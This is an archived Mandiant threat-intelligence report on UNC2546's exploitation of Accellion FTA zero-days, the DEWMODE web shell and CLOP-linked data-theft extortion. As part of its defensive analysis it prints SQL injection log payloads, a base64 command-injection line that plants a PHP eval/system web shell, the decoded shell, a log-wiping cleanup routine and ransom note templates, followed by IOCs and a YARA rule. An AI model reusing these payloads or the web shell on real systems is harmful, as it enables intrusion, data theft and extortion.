{ "id": "632e6e9c-ac30-461f-a576-3ae932d2bebf", "created_at": "2026-04-06T00:12:08.266118Z", "updated_at": "2026-04-10T03:30:21.218415Z", "deleted_at": null, "sha1_hash": "55cd03d8316092650707a6101b02735642e5d106", "title": "Threat Actors Exploit Accellion FTA for Data Theft and Extortion", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 130441, "plain_text": "Threat Actors Exploit Accellion FTA for Data Theft and Extortion\r\nBy Mandiant\r\nPublished: 2021-02-22 · Archived: 2026-04-05 14:39:07 UTC\r\nWritten by: Andrew Moore, Genevieve Stark, Isif Ibrahima, Van Ta, Kimberly Goody\r\nStarting in mid-December 2020, malicious actors that Mandiant tracks as UNC2546 exploited multiple zero-day\r\nvulnerabilities in Accellion’s legacy File Transfer Appliance (FTA) to install a newly discovered web shell named\r\nDEWMODE. The motivation of UNC2546 was not immediately apparent, but starting in late January 2021, several\r\norganizations that had been impacted by UNC2546 in the prior month began receiving extortion emails from actors\r\nthreatening to publish stolen data on the “CL0P^_- LEAKS\" .onion website. Some of the published victim data appears\r\nto have been stolen using the DEWMODE web shell.\r\nNotably, the number of victims on the “CL0P^_- LEAKS\" shaming website has increased in February 2021 with\r\norganizations in the United States, Singapore, Canada, and the Netherlands recently outed by these threat actors.\r\nMandiant has previously reported that FIN11 has threatened to post stolen victim data on this same .onion site as an\r\nadditional tactic to pressure victims into paying extortion demands following the deployment of CLOP ransomware.\r\nHowever, in recent CLOP extortion incidents, no ransomware was deployed nor were the other hallmarks of FIN11\r\npresent.\r\nWe are currently tracking the exploitation of the zero-day Accellion FTA vulnerabilities and data theft from companies\r\nrunning the legacy FTA product as UNC2546, and the subsequent extortion activity as UNC2582. We have identified\r\noverlaps between UNC2582, UNC2546, and prior FIN11 operations, and we will continue to evaluate the relationships\r\nbetween these clusters of activity. For more information on our use of ‘UNC’ designations, see our blog post,\r\n\"DebUNCing Attribution: How Mandiant Tracks Uncategorized Threat Actors.\"\r\nMandiant has been working closely with Accellion in response to these matters and will be producing a complete security\r\nassessment report in the coming weeks. At this time, Accellion has patched all FTA vulnerabilities known to be exploited\r\nby the threat actors and has added new monitoring and alerting capabilities to flag anomalies associated with these attack\r\nvectors. Mandiant has validated these patches. Mandiant is currently performing penetration testing and code review of\r\nthe current version of the Accellion FTA product and has not found any other critical vulnerabilities in the FTA product\r\nbased on our analysis to date. Accellion customers using the FTA legacy product were the targets of the attack.\r\nAccellion FTA is a 20-year-old product nearing end of life. Accellion strongly recommends that FTA customers migrate\r\nto kiteworks, Accellion’s enterprise content firewall platform. Per Accellion, Kiteworks is built on an entirely different\r\ncode base.\r\nThe following CVEs have since been reserved for tracking the recently patched Accellion FTA vulnerabilities:\r\nCVE-2021-27101 - SQL injection via a crafted Host header\r\nCVE-2021-27102 - OS command execution via a local web service call\r\nCVE-2021-27103 - SSRF via a crafted POST request\r\nCVE-2021-27104 - OS command execution via a crafted POST request\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html\r\nPage 1 of 7\n\nUNC2546 and DEWMODE\r\nIn mid-December 2020, Mandiant responded to multiple incidents in which a web shell we call DEWMODE was used to\r\nexfiltrate data from Accellion FTA devices. The Accellion FTA device is a purpose-built application designed to allow an\r\nenterprise to securely transfer large files. The exfiltration activity has affected entities in a wide range of sectors and\r\ncountries.\r\nAcross these incidents, Mandiant observed common infrastructure usage and TTPs, including exploitation of FTA devices\r\nto deploy the DEWMODE web shell. Mandiant determined that a common threat actor we now track as UNC2546 was\r\nresponsible for this activity. While complete details of the vulnerabilities leveraged to install DEWMODE are still being\r\nanalyzed, evidence from multiple client investigations has shown multiple commonalities in UNC2546's activities.\r\nEvidence of Exploitation and DEWMODE Installation\r\nMandiant has been able reconstruct many of the details about how Accellion FTAs have been compromised through\r\nexamination of Apache and system logs from impacted devices—from initial compromise, to deployment of\r\nDEWMODE, and follow-on interaction.\r\nThe earliest identification of activity associated with this campaign occurred in mid-December 2020. At this time,\r\nMandiant identified UNC2546 leveraging an SQL injection vulnerability in the Accellion FTA. This SQL injection served\r\nas the primary intrusion vector.\r\nMandiant observed evidence of SQL injection followed by subsequent requests to additional resources, as shown in\r\nFigure 1.\r\n[.'))union(select(c_value)from(t_global)where(t_global.c_param)=('w1'))#/sid#935ee00][rid#9700968/initial] (1) pass th\r\n['))union(select(loc_id)from(net1.servers)where(proximity)=(0))#/sid#935ee00][rid#9706978/initial] (1) pass through /co\r\n[.'))union(select(reverse(c_value))from(t_global)where(t_global.c_param)=('w1'))#/sid#935ee00][rid#971c098/initial] (1)\r\n[\u003credacted\u003e/sid#935ee00][rid#971a090/initial] (1) pass through /courier/sftp_account_edit.php\r\n[\u003credacted\u003e/sid#935ee00][rid#9706978/initial] (1) pass through /courier/oauth.api\r\n[\u003credacted\u003e/sid#935ee00][rid#9708980/initial] (1) pass through /courier/oauth.api\r\nFigure 1: SQL injection log\r\nUNC2546 has leveraged this SQL injection vulnerability to retrieve a key which appears to be used in conjunction with a\r\nrequest to the file sftp_account_edit.php. Immediately after this request, the built-in Accellion utility admin.pl was\r\nexecuted, resulting in an eval web shell being written to oauth.api.\r\nPWD=/home/seos/courier ; USER=root ; COMMAND=/usr/local/bin/admin.pl --edit_user=F\r\n--mount_cifs=-\r\nV,DF,$(echo${IFS}PD9waHAKCmlmKGlzc2V0KCRfUkVRVUVTVFsndG9rZW4nXSkpCnsKICAgIGV2YWwoYm\r\nFzZTY0X2RlY29kZSgkX1JFUVVFU1RbJ3Rva2VuJ10pKTsKfQplbHNlIGlmKGlzc2V0KCRfUkVRVUVTVFsnd\r\nXNlcm5hbWUnXSkpCnsKICAgIHN5c3RlbSgkX1JFUVVFU1RbJ3VzZXJuYW1lJ10pOwp9CmVsc2UKewogICAgaG\r\nVhZGVyKCdMb2NhdGlvbjogLycpOwp9|base64${IFS}-d|tee${IFS}/home/seos/courier/oauth.api);FUK;\",PASSWORD # \\\" --passwd=pop\r\nFigure 2: Excerpt from log showing creation of eval web shell\r\nThe decoded contents are shown in Figure 3.\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html\r\nPage 2 of 7\n\n\u003c?php\r\nif(isset($_REQUEST['token']))\r\n{\r\n eval(base64_decode($_REQUEST['token']));\r\n}\r\nelse if(isset($_REQUEST['username']))\r\n{\r\n system($_REQUEST['username']);\r\n}\r\nelse\r\n{\r\n header('Location: /');\r\n}\r\nFigure 3: Decoded eval web shell\r\nAlmost immediately following this sequence, the DEWMODE web shell is written to the system. The timing of these\r\nrequests suggests that DEWMODE was delivered via the oauth.api web shell; however, the available evidence does not\r\nindicate the exact mechanism used to write DEWMODE to disk.\r\nMandiant has identified the DEWMODE web shell in one of the following two locations:\r\n/home/seos/courier/about.html\r\n/home/httpd/html/about.html\r\nThe DEWMODE web shell (Figure 4) extracts a list of available files from a MySQL database on the FTA and lists those\r\nfiles and corresponding metadata—file ID, path, filename, uploader, and recipient—on an HTML page. UNC2546 then\r\nuses the presented list to download files through the DEWMODE web shell. Download requests are captured in the FTA’s\r\nweb logs, which will contain requests to the DEWMODE web shell with encrypted and encoded URL parameters, where\r\ndwn is the file path and fn is the requested file name (Figure 5). The encrypted file path and name values visible in web\r\nlogs can be decrypted using key material obtained from the database used by the targeted FTA. Given the complex nature\r\nof this process, if your organization needs assistance reviewing relevant logs, please contact Mandiant or Accellion.\r\nFigure 4: DEWMODE web shell screenshot\r\nGET /courier/about.html?dwn=[REDACTED]\u0026fn=[REDACTED] HTTP/1.1\" 200 1098240863 \"-\" \"-\" \"-\" TLSv1.2 ECDHE-RSA-AES128-SHA\r\nFigure 5: DEWMODE File Download URL parameters\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html\r\nPage 3 of 7\n\nFollowing file downloads, UNC2546 initiates a cleanup routine by passing a specific query parameter named csrftoken\r\nwith the value 11454bd782bb41db213d415e10a0fb3c to DEWMODE. The following actions are performed:\r\nA shell script is written to /tmp/.scr, which will:\r\nRemove all references to about.html from log files located in /var/opt/apache/\r\nWrite the modified log file to /tmp/x then replace the original log file at /var/opt/apache/\r\nDelete the contents of the /home/seos/log/adminpl.log log file.\r\nRemove /home/seos/courier/about.html (DEWMODE) and /home/seos/courier/oauth.api (eval web shell),\r\nand redirect command output to the file /tmp/.out\r\nChange the permissions of the output file to be readable, writeable and executable by all users, and set the\r\nowner to “nobody”\r\nDelete the script file /tmp/.scr and other temporarily created files to assist in cleanup\r\nDisplay cleanup output to the requesting user\r\nAn example of a cleanup request and subsequent execution of the cleanup script can be seen in Figure 6.\r\nGET /courier/about.html?csrftoken=11454bd782bb41db213d415e10a0fb3c HTTP/1.1\" 200 5 \"-\" \"https://[REDACTED]//courier/ab\r\nsft sudo: nobody : TTY=unknown ; PWD=/home/seos/courier ; USER=root ; COMMAND=/usr/local/bin/admin.pl --mount_cifs=AF\r\nFigure 6: DEWMODE cleanup request\r\nMandiant also identified a variant of DEWMODE (bdfd11b1b092b7c61ce5f02ffc5ad55a) which contained minor\r\nchanges to the cleanup operation, including wiping of /var/log/secure and removing about.html and oauth.api from the\r\ndirectories /home/httpd/html/ instead of /home/seos/courier/.\r\nIn a subset of incidents, Mandiant observed UNC2546 requesting a file named cache.js.gz (Figure 7). Based on temporal\r\nfile access to the mysqldump utility and mysql data directories, the archive likely contained a dump of the database. With\r\nthe exception of cache.js.gz, Mandiant has not observed UNC2546 acquiring files from Accellion appliances through any\r\nmethod besides DEWMODE.\r\nGET //courier/cache.js.gz HTTP/1.1\" 200 35654360 \"-\" \"-\" \"python-requests/2.24.0\" TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256\r\nFigure 7: cache.js.gz file request\r\nUNC2582 Data Theft Extortion\r\nShortly after installation of the web shell, in multiple cases within hours, UNC2546 leveraged DEWMODE to download\r\nfiles from compromised FTA instances. While the actors’ motivations were not immediately clear, several weeks after\r\ndelivery of the DEWMODE web shell, victims began to receive extortion emails from an actor claiming association with\r\nthe CLOP ransomware team (Figure 8 and Figure 9). The actors threatened to publish data on the \"CL0P^_- LEAKS\"\r\n.onion shaming website, unless the victim paid an extortion fee. We are tracking the subsequent extortion activity under a\r\nseparate threat cluster, UNC2582. Despite tracking the exploitation and extortion activity in separate threat clusters we\r\nhave observed at least one case where an actor interacted with a DEWMODE web shell from a host that was used to send\r\nUNC2582-attributed extortion email.\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html\r\nPage 4 of 7\n\nHello!\r\nYour network has been hacked, a lot of valuable data stolen. \u003cdescription of stolen data, including the total\r\nsize of the compressed files\u003e We are the CLOP ransomware team, you can google news and articles about\r\nus. We have a website where we publish news and stolen files from companies that have refused to\r\ncooperate. Here is his address http://[redacted].onion/ - use TOR browser or\r\nhttp://[redacted].onion.dog/ - mirror. We are visited by 20-30 thousand journalists, IT experts, hackers\r\nand competitors every day. We suggest that you contact us via chat within 24 hours to discuss the current\r\nsituation. \u003cvictim-specific negotiation URL\u003e - use TOR browser We don't want to hurt, our goal is money.\r\nWe are also ready to provide any evidence of the presence of files with us.\r\nFigure 8: Extortion Note Template 1\r\nThis is the last warning!\r\nIf you don’t get in touch today, tomorrow we will create a page with screenshots of your files (like the others on our\r\nDo not let this happen, write to us in chat or email and we will discuss the situation!\r\nCHAT: \u003cvictim-specific negotiation URL\u003e\r\nEMAIL: unlock@support-box.com\r\nUSE TOR BROWSER!\r\nFigure 9: Extortion Note Template 2\r\nBased on observations at several engagements, UNC2582 appears to follow a pattern of escalation to pressure victims\r\ninto paying extortion demands. Initial emails are sent from a free email account, likely unique per victim, to a seemingly\r\nlimited distribution of addresses at the victim organization. If the victim does not respond in a timely manner, additional\r\nemails are sent to a much larger number of recipients from hundreds or thousands of different email accounts and using\r\nvaried SMTP infrastructure. In at least one case, UNC2582 also sent emails to partners of the victim organization that\r\nincluded links to the stolen data and negotiation chat. Monitoring of the CL0P^_- LEAKS shaming website has\r\ndemonstrated that UNC2582 has followed through on threats to publish stolen data as several new victims have appeared\r\non the site in recent weeks, including at least one organization that has publicly confirmed that their Accellion FTA\r\ndevice had been recently targeted.\r\nKey Overlaps With FIN11\r\nUNC2582 (Extortion) and FIN11\r\nMandiant identified overlaps between UNC2582’s data theft extortion activity and prior FIN11 operations, including\r\ncommon email senders and the use of the CL0P^_- LEAKS shaming site. While FIN11 is known for deploying CLOP\r\nransomware, we have previously observed the group conduct data theft extortion without ransomware deployment,\r\nsimilar to these cases.\r\nSome UNC2582 extortion emails observed in January 2021 were sent from IP addresses and/or email accounts\r\nused by FIN11 in multiple phishing campaigns between August and December 2020, including some of the last\r\ncampaigns that were clearly attributable to the group.\r\nWe have not observed FIN11 phishing activity in the new year. FIN11 has typically paused their phishing\r\noperations over the winter holidays and had several extended gaps in their operations. However, the timing of this\r\ncurrent hiatus is also consistent with UNC2582’s data theft extortion activity.\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html\r\nPage 5 of 7\n\nUNC2582 extortion emails contained a link to the CL0P^_- LEAKS website and/or a victim specific negotiation\r\npage. The linked websites were the same ones used to support historical CLOP operations, a series of ransomware\r\nand data theft extortion campaigns we suspect can be exclusively attributed to FIN11.\r\nUNC2546 (FTA Exploitation and DEWMODE) and FIN11\r\nThere are also limited overlaps between FIN11 and UNC2546.\r\nMany of the organizations compromised by UNC2546 were previously targeted by FIN11.\r\nAn IP address that communicated with a DEWMODE web shell was in the \"Fortunix Networks L.P.\" netblock, a\r\nnetwork frequently used by FIN11 to host download and FRIENDSPEAK command and control (C2) domains.\r\nImplications\r\nThe overlaps between FIN11, UNC2546, and UNC2582 are compelling, but we continue to track these clusters\r\nseparately while we evaluate the nature of their relationships. One of the specific challenges is that the scope of the\r\noverlaps with FIN11 is limited to the later stages of the attack life cycle. UNC2546 uses a different infection vector and\r\nfoothold, and unlike FIN11, we have not observed the actors expanding their presence across impacted networks. We\r\ntherefore have insufficient evidence to attribute the FTA exploitation, DEWMODE, or data theft extortion activity to\r\nFIN11. Using SQL injection to deploy DEWMODE or acquiring access to a DEWMODE shell from a separate threat\r\nactor would represent a significant shift in FIN11 TTPs, given the group has traditionally relied on phishing campaigns as\r\nits initial infection vector and we have not previously observed them use zero-day vulnerabilities.\r\nAcknowledgements\r\nDavid Wong, Brandon Walters, Stephen Eckels and Jon Erickson\r\nIndicators of Compromise (IOCs)\r\nDEWMODE Web Shells\r\nMD5 SHA256\r\n2798c0e836b907e8224520e7e6e4bb42 5fa2b9546770241da7305356d6427847598288290866837626f621d794692c1b\r\nbdfd11b1b092b7c61ce5f02ffc5ad55a 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nUNC2546 Source IP Addresses\r\nThe following source IP addresses were observed in multiple UNC2546 intrusions:\r\n45.135.229.179\r\n79.141.162.82\r\n155.94.160.40\r\n192.154.253.120\r\n192.52.167.101\r\n194.88.104.24\r\nDetections\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html\r\nPage 6 of 7\n\nFireEye Detections\r\nFE_Webshell_PHP_DEWMODE_1\r\nFEC_Webshell_PHP_DEWMODE_1\r\nWebshell.PHP.DEWMODE\r\nMandiant Security Validation\r\nA101-515 Malicious File Transfer - DEWMODE Webshell, Upload, Variant #1\r\nA101-516 Malicious File Transfer - DEWMODE Webshell, Upload, Variant #2\r\nDEWMODE YARA Rule\r\nThe following YARA rule is not intended to be used on production systems or to inform blocking rules without first being\r\nvalidated through an organization's own internal testing processes to ensure appropriate performance and limit the risk of\r\nfalse positives. This rule is intended to serve as a starting point for hunting efforts to identify DEWMODE payloads;\r\nhowever, it may need adjustment over time if the malware family changes.\r\nrule DEWMODE_PHP_Webshell\r\n{\r\n strings:\r\n $s1 = /if \\(isset\\(\\$_REQUEST\\[[\\x22\\x27]dwn[\\x22\\x27]]\\)[\\x09\\x20]{0,32}\u0026\u0026[\\x09\\x20]{0,32}isset\\(\\$_REQUEST\\[[\r\n $s2 = \"\u003cth\u003efile_id\u003c/th\u003e\"\r\n $s3 = \"\u003cth\u003epath\u003c/th\u003e\"\r\n $s4 = \"\u003cth\u003efile_name\u003c/th\u003e\"\r\n $s5 = \"\u003cth\u003euploaded_by\u003c/th\u003e\"\r\n $s6 = \"target=\\\\\\\"_blank\\\\\\\"\u003eDownload\u003c/a\u003e\u003c/td\u003e\"\r\n $s7 = \"Content-Type: application/octet-stream\"\r\n $s8 = \"Content-disposition: attachment; filename=\"\r\n condition:\r\n all of them\r\n}\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html" ], "report_names": [ "accellion-fta-exploited-for-data-theft-and-extortion.html" ], "threat_actors": [ { "id": "6728f306-6259-4e7d-a4ea-59586d90a47d", "created_at": "2023-01-06T13:46:39.175292Z", "updated_at": "2026-04-10T02:00:03.236282Z", "deleted_at": null, "main_name": "FIN11", "aliases": [ "TEMP.Warlock", "UNC902" ], "source_name": "MISPGALAXY:FIN11", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59", "created_at": "2024-06-19T02:03:08.128175Z", "updated_at": "2026-04-10T02:00:03.636663Z", "deleted_at": null, "main_name": "GOLD TAHOE", "aliases": [ "Cl0P Group Identity", "FIN11 ", "GRACEFUL SPIDER ", "SectorJ04 ", "Spandex Tempest ", "TA505 " ], "source_name": "Secureworks:GOLD TAHOE", "tools": [ "Clop", "Cobalt Strike", "FlawedAmmy", "Get2", "GraceWire", "Malichus", "SDBbot", "ServHelper", "TrueBot" ], "source_id": "Secureworks", "reports": null }, { "id": "1db21349-11d6-4e57-805c-fb1e23a8acab", "created_at": "2022-10-25T16:07:23.630365Z", "updated_at": "2026-04-10T02:00:04.694622Z", "deleted_at": null, "main_name": "FIN11", "aliases": [ "Chubby Scorpius", "DEV-0950", "Lace Tempest", "Operation Cyclone" ], "source_name": "ETDA:FIN11", "tools": [ "AZORult", "Amadey", "AmmyyRAT", "AndroMut", "BLUESTEAL", "Cl0p", "EMASTEAL", "FLOWERPIPE", "FORKBEARD", "FRIENDSPEAK", "FlawedAmmyy", "GazGolder", "Get2", "GetandGo", "JESTBOT", "MINEBRIDGE", "MINEBRIDGE RAT", "MINEDOOR", "MIXLABEL", "Meterpreter", "NAILGUN", "POPFLASH", "PuffStealer", "Rultazo", "SALTLICK", "SCRAPMINT", "SHORTBENCH", "SLOWROLL", "SPOONBEARD", "TiniMet", "TinyMet", "VIDAR", "Vidar Stealer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434328, "ts_updated_at": 1775791821, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/55cd03d8316092650707a6101b02735642e5d106.pdf", "text": "https://archive.orkl.eu/55cd03d8316092650707a6101b02735642e5d106.txt", "img": "https://archive.orkl.eu/55cd03d8316092650707a6101b02735642e5d106.jpg" } }